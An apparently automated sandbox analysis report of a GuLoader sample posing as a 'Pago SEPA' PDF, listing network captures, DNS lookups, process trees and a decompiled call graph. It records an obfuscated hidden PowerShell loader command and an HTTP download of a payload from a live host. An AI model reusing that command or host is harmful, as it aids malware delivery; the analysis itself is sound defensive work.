                                                                    Nov 15, 2024 17:21:04.337263107 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.337295055 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.337326050 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.337775946 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.337800980 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.337817907 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.337820053 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.337833881 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.337846041 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.337851048 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.337856054 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.337866068 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.337874889 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.337882996 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.337892056 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.337899923 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.337913990 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.337918997 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.337929010 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.337933064 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.337958097 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.337989092 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.338660955 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.338675976 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.338690042 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.338713884 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.338717937 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.338733912 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.338748932 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.338752031 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.338768959 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.338776112 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.338783979 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.338789940 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.338800907 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.338814974 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.338823080 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.338846922 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.338874102 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.339262962 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.339278936 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.339293957 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.339323997 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.339356899 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.341671944 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.341687918 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.341711998 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.341727018 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.341742992 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.341751099 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.341775894 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.341783047 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.454902887 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.454921961 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.454938889 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455012083 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455018044 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.455018044 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.455029011 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455068111 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455074072 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.455084085 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455101013 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455110073 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.455117941 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455133915 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455148935 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455151081 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.455164909 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455173969 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.455205917 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.455230951 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.455346107 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455363035 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455387115 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455399036 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.455404043 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455420971 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455425978 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.455436945 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.455466032 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.455495119 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455512047 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455526114 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455540895 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455547094 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.455557108 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455575943 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.455586910 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.455806971 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455822945 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.694464922 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.694474936 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.694493055 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.694508076 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.694515944 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.694524050 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.694540977 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.694545984 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.694561005 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.694581985 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.694717884 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.694732904 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.694746971 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.694753885 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.694765091 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.694771051 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.694781065 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.694787979 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.694797039 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.694803953 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.694819927 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.694842100 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.694938898 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.694953918 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.694974899 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.694991112 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.695013046 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.695051908 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.695207119 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.695221901 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.695236921 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.695245028 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.695269108 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.695280075 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.695280075 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.695295095 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.695310116 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.695316076 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.695329905 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.695360899 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.695396900 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.695411921 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.695425987 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.695434093 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.695441961 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.695450068 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.695456982 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.695471048 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.695491076 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.695502996 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.695524931 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.695540905 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.695555925 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.695569992 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.695573092 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.695574045 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.695585966 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.695593119 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.695616007 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.695631027 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:10.653090954 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:10.658647060 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:10.658706903 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:10.658782959 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:10.664446115 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.502465010 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.502557993 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.502748013 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.502777100 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.502820969 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.502821922 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.503453970 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.503473043 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.503515959 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.503587008 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.504127026 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.504148006 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.504180908 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.504206896 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.504936934 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.504956007 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.505012989 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.505012989 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.505557060 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.505647898 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.507781982 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.507828951 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.507925987 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.507967949 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.630247116 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.630273104 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.630295038 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.630331993 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.630331993 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.630387068 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.630760908 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.630778074 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.630834103 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.630834103 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.631645918 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.631691933 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.631827116 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.632118940 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.632138014 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.632191896 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.632191896 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.632808924 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.632829905 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.632896900 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.632896900 CET4996780192.168.2.5162.55.60.2
UDP Packets

Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Nov 15, 2024 17:21:10.614847898 CET  60991        53         192.168.2.5  1.1.1.1
Nov 15, 2024 17:21:10.650446892 CET  53           60991      1.1.1.1      192.168.2.5

DNS Queries

Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name        Type            Class        DNS over HTTPS
Nov 15, 2024 17:21:10.614847898 CET  192.168.2.5  1.1.1.1  0x1312    Standard query (0)  showip.net  A (IP address)  IN (0x0001)  false

DNS Answers

Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name        CName  Address      Type            Class        DNS over HTTPS
Nov 15, 2024 17:21:10.650446892 CET  1.1.1.1    192.168.2.5  0x1312    No error (0)  showip.net         162.55.60.2  A (IP address)  IN (0x0001)  false
                                                                    • 104.168.32.140
                                                                    • showip.net
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.5  49928        104.168.32.140  80                3668  C:\Windows\SysWOW64\msiexec.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 15, 2024 17:21:03.304069042 CET  174                OUT        GET /jUPSCuLd221.bin HTTP/1.1
                                                                   User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                   Host: 104.168.32.140
                                                                   Cache-Control: no-cache
Nov 15, 2024 17:21:03.978981018 CET  1236               IN         HTTP/1.1 200 OK
                                                                   Content-Type: application/octet-stream
                                                                   Last-Modified: Wed, 13 Nov 2024 21:48:36 GMT
                                                                   Accept-Ranges: bytes
                                                                   ETag: "959be5ca1536db1:0"
                                                                   Server: Microsoft-IIS/10.0
                                                                   Date: Fri, 15 Nov 2024 16:21:03 GMT
                                                                   Content-Length: 393280


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.5  49967        162.55.60.2     80                3668  C:\Windows\SysWOW64\msiexec.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 15, 2024 17:21:10.658782959 CET  58                 OUT        GET / HTTP/1.1
                                                                   User-Agent: Project1
                                                                   Host: showip.net
Nov 15, 2024 17:21:11.502465010 CET  1236               IN         HTTP/1.1 200 OK
                                                                   Access-Control-Allow-Headers: *
                                                                   Access-Control-Allow-Methods: *
                                                                   Access-Control-Allow-Origin: *
                                                                   Content-Type: text/html;charset=utf-8
                                                                   Date: Fri, 15 Nov 2024 16:21:11 GMT
                                                                   Server: Caddy
                                                                   Transfer-Encoding: chunked
                                                                    Nov 15, 2024 17:21:11.504936934 CET1236INData Raw: 74 6f 4a 53 4f 4e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 45 61 28 74 68 69 73 2e 68 2c 46 61 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 21 31 2c 21 31 29 3b 72 65 74 75 72 6e 20 50 61 28 74 68 69 73 2c 61 2c 21 30 29 7d 3b 54 2e
                                                                    Data Ascii: toJSON=function(){var a=Ea(this.h,Fa,void 0,void 0,!1,!1);return Pa(this,a,!0)};T.prototype.s=M;T.prototype.toString=function(){return Pa(this,this.h,!1).toString()}; function Pa(a,b,c){var d=a.constructor.v,e=L(J(c?a.h:b)),f=!1;if(d){if
                                                                    Nov 15, 2024 17:21:11.504956007 CET1236INData Raw: 28 61 29 7b 74 68 69 73 2e 68 3d 52 28 61 29 7d 6e 28 52 61 2c 54 29 3b 76 61 72 20 53 61 3d 51 61 28 52 61 29 3b 76 61 72 20 55 3b 66 75 6e 63 74 69 6f 6e 20 56 28 61 29 7b 74 68 69 73 2e 67 3d 61 7d 56 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53
                                                                    Data Ascii: (a){this.h=R(a)}n(Ra,T);var Sa=Qa(Ra);var U;function V(a){this.g=a}V.prototype.toString=function(){return this.g+""};var Ta={};function Ua(){return Math.floor(2147483648*Math.random()).toString(36)+Math.abs(Math.floor(2147483648*Math.random())
                                                                    Nov 15, 2024 17:21:11.505557060 CET1236INData Raw: 32 46 74 59 6d 56 79 58 7a 49 30 5a 48 41 75 63 47 35 6e 22 29 2c 61 62 3d 70 2e 61 74 6f 62 28 22 57 57 39 31 49 47 46 79 5a 53 42 7a 5a 57 56 70 62 6d 63 67 64 47 68 70 63 79 42 74 5a 58 4e 7a 59 57 64 6c 49 47 4a 6c 59 32 46 31 63 32 55 67 59
                                                                    Data Ascii: 2FtYmVyXzI0ZHAucG5n"),ab=p.atob("WW91IGFyZSBzZWVpbmcgdGhpcyBtZXNzYWdlIGJlY2F1c2UgYWQgb3Igc2NyaXB0IGJsb2NraW5nIHNvZnR3YXJlIGlzIGludGVyZmVyaW5nIHdpdGggdGhpcyBwYWdlLg=="),bb=p.atob("RGlzYWJsZSBhbnkgYWQgb3Igc2NyaXB0IGJsb2NraW5nIHNvZnR3YXJlLCB0aGVu
                                                                    Nov 15, 2024 17:21:11.507781982 CET1236INData Raw: 2c 22 49 4d 47 22 29 3b 64 2e 63 6c 61 73 73 4e 61 6d 65 3d 55 61 28 29 3b 64 2e 73 72 63 3d 24 61 3b 64 2e 61 6c 74 3d 22 57 61 72 6e 69 6e 67 20 69 63 6f 6e 22 3b 64 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 32 34 70 78 22 3b 64 2e 73 74 79
                                                                    Data Ascii: ,"IMG");d.className=Ua();d.src=$a;d.alt="Warning icon";d.style.height="24px";d.style.width="24px";d.style["padding-right"]="16px";var e=X(a),f=X(a);f.style["font-weight"]="bold";f.textContent=ab;var g=X(a);g.textContent=bb;Y(a,e,f);Y(a,e,g);Y(


                                                                    Target ID:0
                                                                    Start time:11:20:03
                                                                    Start date:15/11/2024
                                                                    Path:C:\Users\user\Desktop\Pago SEPA.pdf.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\Pago SEPA.pdf.exe"
                                                                    Imagebase:0x400000
                                                                    File size:570'654 bytes
                                                                    MD5 hash:B09A414939191D7F43C114C02726DDB9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:2
                                                                    Start time:11:20:04
                                                                    Start date:15/11/2024
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"powershell.exe" -windowstyle minimized "$Alkamine36=Get-Content -Raw 'C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers\Multipara168.Sel';$preallocators=$Alkamine36.SubString(1880,3);.$preallocators($Alkamine36)"
                                                                    Imagebase:0xa0000
                                                                    File size:433'152 bytes
                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2604236409.000000000BBDF000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:3
                                                                    Start time:11:20:04
                                                                    Start date:15/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:6
                                                                    Start time:11:20:54
                                                                    Start date:15/11/2024
                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                    Imagebase:0x750000
                                                                    File size:59'904 bytes
                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:7
                                                                    Start time:11:21:09
                                                                    Start date:15/11/2024
                                                                    Path:C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                                                    Imagebase:0x4f0000
                                                                    File size:418'304 bytes
                                                                    MD5 hash:64ACA4F48771A5BA50CD50F2410632AD
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                      Execution Graph

                                                                      Execution Coverage:22%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:22.1%
                                                                      Total number of Nodes:1331
                                                                      Total number of Limit Nodes:36
SendMessageW 4224->4227 4237 404f20 4225->4237 4238 404f19 ImageList_Destroy 4225->4238 4245 404f30 4225->4245 4226->4225 4227->4220 4232 4040e3 19 API calls 4228->4232 4229 404d58 4234 40414a 8 API calls 4229->4234 4230 404e3b SendMessageW 4236 404e49 4230->4236 4231 404a48 5 API calls 4249 404dd6 4231->4249 4250 404c51 4232->4250 4233 404ea2 SendMessageW 4233->4229 4240 404eb7 SendMessageW 4233->4240 4235 4050eb 4234->4235 4236->4223 4236->4229 4236->4233 4241 404f29 GlobalFree 4237->4241 4237->4245 4238->4237 4239 40509f 4239->4229 4246 4050b1 ShowWindow GetDlgItem ShowWindow 4239->4246 4243 404eca 4240->4243 4241->4245 4242 404d26 GetWindowLongW SetWindowLongW 4244 404d3f 4242->4244 4254 404edb SendMessageW 4243->4254 4247 404d45 ShowWindow 4244->4247 4248 404d5d 4244->4248 4245->4239 4259 404ac8 4 API calls 4245->4259 4263 404f6b 4245->4263 4246->4229 4267 404118 SendMessageW 4247->4267 4268 404118 SendMessageW 4248->4268 4249->4230 4249->4236 4250->4242 4253 404ca1 SendMessageW 4250->4253 4255 404d20 4250->4255 4257 404cdd SendMessageW 4250->4257 4258 404cee SendMessageW 4250->4258 4253->4250 4254->4223 4255->4242 4255->4244 4256->4231 4256->4236 4256->4249 4257->4250 4258->4250 4259->4263 4260 405075 InvalidateRect 4260->4239 4261 40508b 4260->4261 4269 404a03 4261->4269 4262 404f99 SendMessageW 4266 404faf 4262->4266 4263->4262 4263->4266 4265 405023 SendMessageW SendMessageW 4265->4266 4266->4260 4266->4265 4267->4229 4268->4256 4272 40493a 4269->4272 4271 404a18 4271->4239 4273 404953 4272->4273 4274 406041 18 API calls 4273->4274 4275 4049b7 4274->4275 4276 406041 18 API calls 4275->4276 4277 4049c2 4276->4277 4278 406041 18 API calls 4277->4278 4279 4049d8 lstrlenW wsprintfW SetDlgItemTextW 4278->4279 4279->4271 4280 401cfa GetDlgItem GetClientRect 4281 402bbf 18 API calls 4280->4281 4282 401d2c LoadImageW SendMessageW 4281->4282 4283 401d4a DeleteObject 4282->4283 4284 402a4c 4282->4284 4283->4284 3801 40237b 3802 402381 3801->3802 3803 402bbf 18 API 
